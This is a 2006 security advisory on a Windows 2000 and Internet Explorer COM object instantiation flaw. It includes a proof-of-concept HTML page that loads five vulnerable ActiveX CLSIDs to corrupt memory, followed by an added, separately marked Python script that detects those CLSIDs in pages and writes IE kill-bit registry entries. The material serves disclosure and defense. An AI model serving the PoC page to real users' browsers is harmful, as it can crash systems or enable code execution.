Advisory ID: XSec-06-08
Advisory Name: Windows 2000 Multiple COM Object Instantiation Vulnerability
Release Date: 08/21/2006
Tested on: Windows 2000/Internet Explorer 6.0 SP1
Affected version: Windows 2000
Author: nop <nop#xsec.org>
http://www.xsec.org

Overview:

Multiple vulnerabilities have been found in Windows 2000. When Internet Explorer
tries to instantiate the ciodm.dll, MyInfo.dll, msdxm.ocx or Creator.dll
(Media Player 9) COM objects as an ActiveX control, it may corrupt system memory
in such a way that an attacker may cause a denial of service and possibly
execute arbitrary code.

Exploit:

=============== 2000obj.htm start ================
<!--
// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN
// http://www.xsec.org
// nop (nop#xsec.org)
-->
<html>
<head>
<title>COM-tester</title>
</head>
<body>
<script>
var i = 0;
var clsid = new Array(
// NO: 1
// CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
// Info: Microsoft Index Server Catalog Administration Object
// ProgID: Microsoft.ISCatAdm.1
// InprocServer32: C:\WINNT\system32\ciodm.dll
"{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",
// NO: 2
// CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
// Info: MyInfo ASP Component
// ProgID: MSWC.MyInfo.1
// InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
"{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",
// NO: 3
// CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
// Info: RadioServer Class
// ProgID: Mmedia.RadioServer.1
// InprocServer32: C:\WINNT\system32\msdxm.ocx
"{8E71888A-423F-11D2-876E-00A0C9082467}",
// NO: 4 media player?
// CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
// Info: CdCreator Class
// ProgID: Creator.CdCreator.1
// InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
"{606EF130-9852-11D3-97C6-0060084856D4}",
// NO: 5 media player?
// CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
// Info: CdDevice Class
// ProgID: Creator.CdDevice.1
// InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
"{F849164D-9863-11D3-97C6-0060084856D4}",
// END
null
);

// Walk the list until the null terminator; each iteration creates an
// <object> element and sets its classid, which makes IE load the control.
while (clsid[i]) {
    var a = document.createElement("object");
    window.status = "Testing Object " + clsid[i] + "...";
    a.setAttribute("classid", "clsid:" + clsid[i]);
    i++;
}
window.status = "failed!";
</script>
</body>
</html>
=============== 2000obj.htm end ==================

Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16

About XSec: We are redhat.
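The following is an added defender-side example and is not part of the XSec advisory or its PoC. It takes the five CLSIDs listed above and does the two things a responder usually wants: scan a captured HTML page (for instance from a web proxy) for references to those CLSIDs, whether in a static <object classid="clsid:{...}"> attribute or as a GUID literal inside inline script as in the PoC, and emit a .reg file that sets the Internet Explorer kill bit for each of them. The registry key and the 0x400 "Compatibility Flags" value are Microsoft's documented kill-bit mechanism; the sample HTML below is constructed for the example, and the function names are this example's own.

```python
import re
from html.parser import HTMLParser

# CLSIDs taken from the advisory (upper-case, braces included).
AFFECTED_CLSIDS = frozenset({
    "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",  # ciodm.dll, Microsoft.ISCatAdm.1
    "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",  # MyInfo.dll, MSWC.MyInfo.1
    "{8E71888A-423F-11D2-876E-00A0C9082467}",  # msdxm.ocx, Mmedia.RadioServer.1
    "{606EF130-9852-11D3-97C6-0060084856D4}",  # creator.dll, Creator.CdCreator.1
    "{F849164D-9863-11D3-97C6-0060084856D4}",  # creator.dll, Creator.CdDevice.1
})

# A braced GUID, case-insensitive (PoC pages may lower-case it).
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


class _ObjectScanner(HTMLParser):
    """Collects classid attributes of <object> tags and the text of <script> tags."""

    def __init__(self):
        super().__init__()
        self.object_clsids = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            for name, value in attrs:
                if name == "classid" and value:
                    m = GUID_RE.search(value)
                    if m:
                        self.object_clsids.append(m.group(0).upper())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here (possibly in several chunks); keep them
        # so GUIDs built into the page's JavaScript are found too.
        if self._in_script:
            self.script_text.append(data)


def scan_for_clsids(html, affected=AFFECTED_CLSIDS):
    """Return sorted (where, clsid) pairs for affected CLSIDs found in html.

    'where' is "object" for an <object classid=...> attribute and "script"
    for a GUID literal inside inline script.
    """
    p = _ObjectScanner()
    p.feed(html)
    p.close()
    hits = set()
    for c in p.object_clsids:
        if c in affected:
            hits.add(("object", c))
    for m in GUID_RE.finditer("".join(p.script_text)):
        c = m.group(0).upper()
        if c in affected:
            hits.add(("script", c))
    return sorted(hits)


def kill_bit_reg(clsids=AFFECTED_CLSIDS):
    """Return .reg file text that sets the IE kill bit for each CLSID.

    Key: HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{CLSID}
    Value: "Compatibility Flags" = 0x400 (do not instantiate in Internet Explorer).
    """
    key_prefix = (r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                  r"\ActiveX Compatibility")
    lines = ["Windows Registry Editor Version 5.00", ""]
    for c in sorted(clsids):
        lines.append(key_prefix + "\\" + c + "]")
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\r\n".join(lines)


# Constructed sample page: one static <object> tag with an affected CLSID, one
# unrelated CLSID, and an inline script shaped like the advisory's PoC.
SAMPLE_HTML = """<html><body>
<object classid="clsid:{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}"></object>
<object classid="clsid:{00000000-0000-0000-0000-000000000000}"></object>
<script>
var clsid = new Array("{3bc4f3a3-652a-11d1-b4d4-00c04fc2db8d}", null);
var a = document.createElement("object");
a.setAttribute("classid", "clsid:" + clsid[0]);
</script>
</body></html>"""

if __name__ == "__main__":
    for where, c in scan_for_clsids(SAMPLE_HTML):
        print("affected CLSID referenced in %s: %s" % (where, c))
    print(kill_bit_reg())
```

Scanning catches the dynamic PoC pattern only because the GUID literal still appears in the script text; a page that assembles the GUID from fragments would need a runtime check instead, which is why the kill bit, applied on the client, is the durable mitigation.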